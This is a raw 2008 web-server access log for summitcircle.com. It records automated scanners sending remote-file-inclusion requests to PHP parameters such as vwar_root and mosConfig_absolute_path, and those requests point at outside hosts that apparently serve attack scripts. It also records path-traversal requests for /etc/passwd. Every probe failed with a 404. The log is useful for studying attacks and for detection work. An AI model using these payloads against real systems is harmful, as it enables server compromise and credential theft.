74.63.2.169 - - [29/Jun/2008:05:53:43 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://yeguadamendeika.com/images/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "summitcircle.com"
74.63.2.169 - - [29/Jun/2008:05:53:43 -0700] "GET /logs/access_071231.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://yeguadamendeika.com/images/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "summitcircle.com"
74.63.2.169 - - [29/Jun/2008:05:53:44 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://yeguadamendeika.com/images/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
74.63.2.169 - - [29/Jun/2008:05:53:44 -0700] "GET /logs/access_080107.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://yeguadamendeika.com/images/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
74.63.2.169 - - [29/Jun/2008:05:53:44 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://yeguadamendeika.com/images/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
202.123.68.13 - - [29/Jun/2008:05:54:46 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://r5f5i5.nm.ru/57?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
78.111.80.12 - - [29/Jun/2008:05:54:48 -0700] "GET /logs/access_071210.log//index.php?body=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
78.111.80.12 - - [29/Jun/2008:05:54:49 -0700] "GET //index.php?body=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
78.111.80.12 - - [29/Jun/2008:05:54:49 -0700] "GET /logs//index.php?body=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
78.111.80.12 - - [29/Jun/2008:05:54:49 -0700] "GET /logs/access_071008.log//index.php?body=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
202.123.68.13 - - [29/Jun/2008:05:54:50 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://r5f5i5.nm.ru/57?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
70.85.201.66 - - [29/Jun/2008:05:54:56 -0700] "GET /logs/access_071231.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
70.85.201.66 - - [29/Jun/2008:05:54:56 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
66.98.184.65 - - [29/Jun/2008:05:54:56 -0700] "GET /logs/access_071231.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
70.85.201.66 - - [29/Jun/2008:05:54:56 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
66.98.184.65 - - [29/Jun/2008:05:54:56 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
66.98.184.65 - - [29/Jun/2008:05:54:57 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
70.85.201.66 - - [29/Jun/2008:05:54:58 -0700] "GET /logs/access_071231.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
70.85.201.66 - - [29/Jun/2008:05:54:59 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
70.85.201.66 - - [29/Jun/2008:05:54:59 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
66.98.184.65 - - [29/Jun/2008:05:55:16 -0700] "GET /logs/access_071231.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
66.98.184.65 - - [29/Jun/2008:05:55:16 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
66.98.184.65 - - [29/Jun/2008:05:55:16 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
87.246.68.51 - - [29/Jun/2008:05:55:17 -0700] "GET /logs/access_071231.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://lodolo.com/x?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "summitcircle.com"
87.246.68.51 - - [29/Jun/2008:05:55:17 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://lodolo.com/x?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "summitcircle.com"
87.246.68.51 - - [29/Jun/2008:05:55:17 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://lodolo.com/x?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "summitcircle.com"
70.85.201.66 - - [29/Jun/2008:05:55:59 -0700] "GET /logs/access_071231.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
70.85.201.66 - - [29/Jun/2008:05:55:59 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
70.85.201.66 - - [29/Jun/2008:05:55:59 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
66.98.184.65 - - [29/Jun/2008:05:56:08 -0700] "GET /logs/access_071231.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
66.98.184.65 - - [29/Jun/2008:05:56:08 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
66.98.184.65 - - [29/Jun/2008:05:56:09 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
216.75.35.118 - - [29/Jun/2008:05:56:20 -0700] "GET //modify.php?dir_module=http://www.delcorso.org/images/blank? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
70.85.201.66 - - [29/Jun/2008:05:56:58 -0700] "GET /logs/access_080114.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.201.66 - - [29/Jun/2008:05:56:58 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.201.66 - - [29/Jun/2008:05:56:58 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.201.66 - - [29/Jun/2008:05:56:59 -0700] "GET /logs/access_080114.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.201.66 - - [29/Jun/2008:05:56:59 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.201.66 - - [29/Jun/2008:05:56:59 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
87.246.68.51 - - [29/Jun/2008:05:56:59 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://lodolo.com/x?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "summitcircle.com"
66.98.184.65 - - [29/Jun/2008:05:57:15 -0700] "GET /logs/access_080114.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.98.184.65 - - [29/Jun/2008:05:57:16 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.98.184.65 - - [29/Jun/2008:05:57:16 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.98.184.65 - - [29/Jun/2008:05:57:20 -0700] "GET /logs/access_080114.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.98.184.65 - - [29/Jun/2008:05:57:20 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.98.184.65 - - [29/Jun/2008:05:57:21 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
64.13.225.80 - - [29/Jun/2008:05:57:22 -0700] "GET /logs/access_071029.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.gocavs.net/sportsphool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
87.246.68.51 - - [29/Jun/2008:05:57:25 -0700] "GET /logs/access_080114.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://lodolo.com/x?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
87.246.68.51 - - [29/Jun/2008:05:57:25 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://lodolo.com/x?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
87.246.68.51 - - [29/Jun/2008:05:57:25 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://lodolo.com/x?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
78.111.80.12 - - [29/Jun/2008:05:57:27 -0700] "GET /logs/access.log//index.php?dir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
78.111.80.12 - - [29/Jun/2008:05:57:27 -0700] "GET /logs//index.php?dir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
78.111.80.12 - - [29/Jun/2008:05:57:35 -0700] "GET //index.php?dir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
78.111.80.12 - - [29/Jun/2008:05:57:38 -0700] "GET /logs/access_071029.log//index.php?dir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
70.85.201.66 - - [29/Jun/2008:05:57:43 -0700] "GET /logs/access_080114.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.201.66 - - [29/Jun/2008:05:57:43 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.201.66 - - [29/Jun/2008:05:57:43 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.98.184.65 - - [29/Jun/2008:05:58:04 -0700] "GET /logs/access_080114.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.98.184.65 - - [29/Jun/2008:05:58:04 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.98.184.65 - - [29/Jun/2008:05:58:04 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
194.87.5.70 - - [29/Jun/2008:05:58:27 -0700] "GET /logs/access_070916.log/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.endureros.com//db/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
194.87.5.70 - - [29/Jun/2008:05:58:27 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.endureros.com//db/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
194.87.5.70 - - [29/Jun/2008:05:58:28 -0700] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.endureros.com//db/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.246.68.51 - - [29/Jun/2008:05:59:03 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://lodolo.com/x?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
87.246.68.51 - - [29/Jun/2008:05:59:04 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://lodolo.com/x?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
61.222.167.228 - - [29/Jun/2008:05:59:13 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mosaicessential.com/images/response1??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "summitcircle.com"
61.222.167.228 - - [29/Jun/2008:05:59:13 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mosaicessential.com/images/response1??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "summitcircle.com"
61.222.167.228 - - [29/Jun/2008:05:59:16 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mosaicessential.com/images/response1??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.summitcircle.com"
61.222.167.228 - - [29/Jun/2008:05:59:17 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mosaicessential.com/images/response1??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.summitcircle.com"
69.10.142.104 - - [29/Jun/2008:05:59:43 -0700] "GET /logs/access_071029.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
78.111.80.12 - - [29/Jun/2008:06:00:05 -0700] "GET //index.php?body=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
59.126.172.166 - - [29/Jun/2008:06:00:08 -0700] "GET /logs/access_080526.log/index.php?mosConfig_absolute_path=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
59.126.172.166 - - [29/Jun/2008:06:00:10 -0700] "GET /index.php?mosConfig_absolute_path=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
59.126.172.166 - - [29/Jun/2008:06:00:11 -0700] "GET /logs/index.php?mosConfig_absolute_path=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.13.225.80 - - [29/Jun/2008:06:00:16 -0700] "GET /logs/access_080406.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.gocavs.net/sportsphool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
212.227.127.168 - - [29/Jun/2008:06:00:18 -0700] "GET /logs/access.log/include/bbs.lib.inc.php?site_path=http://www.holidayinfos.com/4images/data/media/666? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
212.227.127.168 - - [29/Jun/2008:06:00:18 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.holidayinfos.com/4images/data/media/666? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
212.227.127.168 - - [29/Jun/2008:06:00:18 -0700] "GET /logs/include/bbs.lib.inc.php?site_path=http://www.holidayinfos.com/4images/data/media/666? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
194.87.5.70 - - [29/Jun/2008:06:01:10 -0700] "GET /logs/access_080128.log/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.endureros.com//db/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.246.68.51 - - [29/Jun/2008:06:01:15 -0700] "GET /source/mod/rss/channeledit.php?Codebase=http://bjork.axspace.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.summitcircle.com"
87.246.68.51 - - [29/Jun/2008:06:01:15 -0700] "GET /logs/source/mod/rss/channeledit.php?Codebase=http://bjork.axspace.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "summitcircle.com"
87.246.68.51 - - [29/Jun/2008:06:01:15 -0700] "GET /logs/source/mod/rss/channeledit.php?Codebase=http://bjork.axspace.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.summitcircle.com"
87.246.68.51 - - [29/Jun/2008:06:01:15 -0700] "GET /source/mod/rss/channeledit.php?Codebase=http://bjork.axspace.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "summitcircle.com"
212.71.154.105 - - [29/Jun/2008:06:01:33 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
202.123.68.13 - - [29/Jun/2008:06:04:01 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://r5f5i5.nm.ru/57?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
74.52.166.162 - - [29/Jun/2008:06:05:00 -0700] "GET /logs/access_070826.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
74.52.166.162 - - [29/Jun/2008:06:05:01 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
74.52.166.162 - - [29/Jun/2008:06:05:01 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
69.72.211.242 - - [29/Jun/2008:06:05:06 -0700] "GET /logs/access_071001.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
69.72.211.242 - - [29/Jun/2008:06:05:09 -0700] "GET /logs/access_071008.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
72.47.204.44 - - [29/Jun/2008:06:05:31 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mosaicessential.com/images/response1??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "summitcircle.com"
72.47.204.44 - - [29/Jun/2008:06:05:31 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mosaicessential.com/images/response1??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "summitcircle.com"
72.47.204.44 - - [29/Jun/2008:06:05:35 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mosaicessential.com/images/response1??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.summitcircle.com"
72.47.204.44 - - [29/Jun/2008:06:05:36 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mosaicessential.com/images/response1??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.summitcircle.com"
193.34.16.180 - - [29/Jun/2008:06:05:42 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
193.34.16.180 - - [29/Jun/2008:06:05:43 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
212.71.154.105 - - [29/Jun/2008:06:06:21 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
212.71.154.105 - - [29/Jun/2008:06:06:21 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
74.52.166.162 - - [29/Jun/2008:06:06:23 -0700] "GET /logs/access_071231.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
71.6.211.72 - - [29/Jun/2008:06:06:23 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
74.52.166.162 - - [29/Jun/2008:06:06:23 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
71.6.211.72 - - [29/Jun/2008:06:06:23 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
74.52.166.162 - - [29/Jun/2008:06:06:23 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
74.200.206.130 - - [29/Jun/2008:06:06:24 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mosaicessential.com/images/response1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "summitcircle.com"
74.200.206.130 - - [29/Jun/2008:06:06:24 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mosaicessential.com/images/response1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "summitcircle.com"
74.200.206.130 - - [29/Jun/2008:06:06:28 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mosaicessential.com/images/response1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.summitcircle.com"
74.200.206.130 - - [29/Jun/2008:06:06:28 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mosaicessential.com/images/response1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.summitcircle.com"
216.75.35.118 - - [29/Jun/2008:06:07:07 -0700] "GET /logs/access_071112.log//modify.php?dir_module=http://www.delcorso.org/images/blank? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.75.35.118 - - [29/Jun/2008:06:07:07 -0700] "GET /logs//modify.php?dir_module=http://www.delcorso.org/images/blank? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
193.34.16.180 - - [29/Jun/2008:06:07:25 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
193.34.16.180 - - [29/Jun/2008:06:07:25 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
87.246.68.51 - - [29/Jun/2008:06:07:30 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://lodolo.com/x?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
78.111.80.12 - - [29/Jun/2008:06:07:31 -0700] "GET //index.php?dir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
72.30.215.111 - - [29/Jun/2008:06:07:34 -0700] "GET /SlurpConfirm404/psalm/quickies.htm HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.summitcircle.com"
216.75.35.118 - - [29/Jun/2008:06:08:10 -0700] "GET /mvcw_conver.php?step=1&vwar_root=http://www.delcorso.org/images/blank? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.75.35.118 - - [29/Jun/2008:06:08:10 -0700] "GET //mvcw_conver.php?step=1&vwar_root=http://www.delcorso.org/images/blank? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
